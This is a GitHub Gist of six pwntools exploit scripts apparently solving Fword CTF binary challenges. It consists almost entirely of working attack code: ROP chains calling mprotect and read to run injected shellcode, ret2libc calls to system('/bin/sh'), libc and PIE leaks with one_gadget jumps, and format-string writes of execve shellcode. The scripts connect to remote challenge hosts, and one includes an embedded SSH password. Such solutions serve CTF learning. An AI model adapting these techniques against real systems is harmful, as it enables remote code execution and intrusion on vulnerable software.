Created
August 30, 2020 17:03
-
-
Save po6ix/31a1ed1b033b1ab23541c84e83de448d to your computer and use it in GitHub Desktop.
Fword CTF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
context.arch = 'amd64' | |
# p = process('./blacklist') | |
p = remote('blacklist.fword.wtf', 1236) | |
e = ELF('./blacklist') | |
mprotect = 0x448CF0 | |
read = 0x447D30 | |
bss_start = 0x4d2000 | |
bss = 0x4d2800 | |
pop_rdi_ret = 0x4017b6 | |
pop_rsi_ret = 0x4024f6 | |
pop_rdx_ret = 0x401db2 | |
pause() | |
payload = 'a' * 0x40 | |
payload += p64(0) | |
# mprotect(bss_start, 10000, 7) | |
payload += p64(pop_rdi_ret) | |
payload += p64(bss_start) | |
payload += p64(pop_rsi_ret) | |
payload += p64(10000) | |
payload += p64(pop_rdx_ret) | |
payload += p64(7) | |
payload += p64(mprotect) | |
# read(0, bss, 100) | |
payload += p64(pop_rdi_ret) | |
payload += p64(0) | |
payload += p64(pop_rsi_ret) | |
payload += p64(bss) | |
payload += p64(pop_rdx_ret) | |
payload += p64(0x400) | |
payload += p64(read) | |
payload += p64(bss) | |
payload += p64(0) | |
shellcode = '' | |
shellcode += shellcraft.pushstr('') | |
shellcode += shellcraft.mov('rdi', 0x4d2a00) | |
shellcode += shellcraft.openat(0, 'rdi') | |
shellcode += shellcraft.mov('rdi', 0x4d2a0a) | |
shellcode += shellcraft.openat(3, 'rdi') | |
shellcode += shellcraft.sendfile(1, 4, 0, 1000) | |
shellcode_asm = asm(shellcode) | |
shellcode_asm = shellcode_asm.ljust(0x200) | |
shellcode_asm += '/home/fbi\0' # 0x4d2a00 | |
shellcode_asm += 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacma.txt\0' # 0x4d2a0a | |
p.sendline(payload) | |
p.send(shellcode_asm) | |
p.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
s = ssh(user='ctf',host='superez.fword.wtf',port=2222,password='FwOrDAndKahl4FTW') | |
p = s.run("/bin/bash") | |
p.sendlineafter('$', './task') | |
e = ELF('./superez_patched') | |
# p = process('./superez_patched', shell=True) | |
# e = ELF('./superez_patched') | |
payload = '\0' * (0xa8) | |
# payload += p64(0x400917) | |
payload += p64(0x400918) | |
p.sendlineafter('continue:', payload) | |
p.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
p = remote('54.210.217.206', 1240) | |
e = ELF('./molotov') | |
libc = ELF('./libc6_2.30-0ubuntu2.2_i386.so') | |
system = int(p.recvline(), 16) | |
libc_base = system - libc.symbols['system'] | |
binsh = libc_base + libc.search('/bin/sh\0').next() | |
info(hex(libc.search('/bin/sh\0').next())) | |
pr = libc_base + 0xd639e | |
pppr = libc_base + 0xd639c | |
info('system: ' + hex(system)) | |
info('binsh: ' + hex(binsh)) | |
info('libc_base: ' + hex(libc_base)) | |
info('pr: ' + hex(pr)) | |
info('pppr: ' + hex(pppr)) | |
payload = 'a' * 0x1c | |
payload += p32(0) | |
payload += p32(system) | |
payload += p32(0) | |
payload += p32(binsh) | |
payload += p32(0) | |
payload += p32(0) | |
payload += p32(0) | |
p.sendlineafter(':', payload) | |
p.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
# p = process('./numbers') | |
p = remote('numbers.fword.wtf', 1237) | |
e = ELF('./numbers') | |
p.sendafter('??', '-1') | |
p.sendafter('??', 'a' * 8 ) | |
p.recvline() | |
libc_leak = u64(p.recvline()[8:8+6] + '\0\0') | |
libc_base = libc_leak - 0x42480 | |
one_gadget = libc_base + 328070 # 328070 328163 1064784 | |
info('libc_leak: ' + hex(libc_leak)) | |
info('libc_base: ' + hex(libc_base)) | |
info('one_gadget: ' + hex(one_gadget)) | |
payload = 'a' * 0x40 | |
payload += p64(0) | |
payload += p64(one_gadget) | |
pause() | |
p.sendline() | |
p.sendafter('??', '-1') | |
p.sendafter('??', payload ) | |
p.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
# p = process('./one_piece_remake') | |
p = remote('onepiece.fword.wtf', 1236) | |
e = ELF('./one_piece_remake') | |
payload = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80" | |
for i in range(0, len(payload), 4): | |
p.sendlineafter('>>', 'gomugomunomi') | |
p.sendafter('>>', fmtstr_payload(7, {0x804A038+i:payload[i:i+4]})) | |
p.sendlineafter('>>', 'run') | |
p.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
# p = process('./one_piece') | |
p = remote('onepiece.fword.wtf', 1238) | |
e = ELF('./one_piece') | |
libc = ELF('./libc6_2.30-0ubuntu2.1_amd64.so') | |
# libc = ELF('./libc-2.23.so') | |
p.sendlineafter('>>', 'read') | |
p.sendafter(':', 'a' + 'z' * 38 + 'z') | |
p.sendlineafter('>>', 'gomugomunomi') | |
pie_leak = int(p.recvline().split(':')[1], 16) | |
pie_base = pie_leak - 0xa3a | |
bss = pie_base + 0x202800 | |
read_got = pie_base + e.got['read'] | |
read_plt = pie_base + e.plt['read'] | |
printf_got = pie_base + e.got['printf'] | |
puts_got = pie_base + e.got['puts'] | |
puts_plt = pie_base + e.plt['puts'] | |
ret = pie_base + 0x70e | |
pop_rdi_ret = pie_base + 0xba3 | |
main_start = pie_base + 0xA3F | |
target = pie_base + 0x238 | |
info('pie_leak: ' + hex(pie_leak)) | |
info('pie_base: ' + hex(pie_base)) | |
info('puts_got: ' + hex(puts_got)) | |
info('read_got: ' + hex(read_got)) | |
info('ret: ' + hex(ret)) | |
info('pop_rdi_ret: ' + hex(pop_rdi_ret)) | |
pause() | |
payload = 'z' * 0x30 + p64(0) | |
payload += p64(pop_rdi_ret) | |
payload += p64(puts_got) | |
payload += p64(puts_plt) | |
payload += p64(main_start) | |
p.sendlineafter(':', payload) | |
p.recvline() | |
puts = u64(p.recvline()[:-1] + '\0\0') | |
libc_base = puts - libc.symbols['puts'] | |
system = libc_base + libc.symbols['system'] | |
# one_gadget_offset = 283158 # 283158 283242 983716 987463 | |
one_gadget_offset = 1093545 # 945043 945046 945049 1093545 | |
one_gadget = libc_base + one_gadget_offset | |
info('puts: ' + hex(puts)) | |
info('libc_base: ' + hex(libc_base)) | |
info('system: ' + hex(system)) | |
info('one_gadget: ' + hex(one_gadget)) | |
payload = 'z' * 0x30 + p64(0) | |
payload += p64(one_gadget) | |
p.sendlineafter('>>', 'read') | |
p.sendafter(':', 'a' + 'z' * 38 + 'z') | |
p.sendlineafter('>>', 'gomugomunomi') | |
p.recvline() | |
p.sendlineafter(':', payload) | |
p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment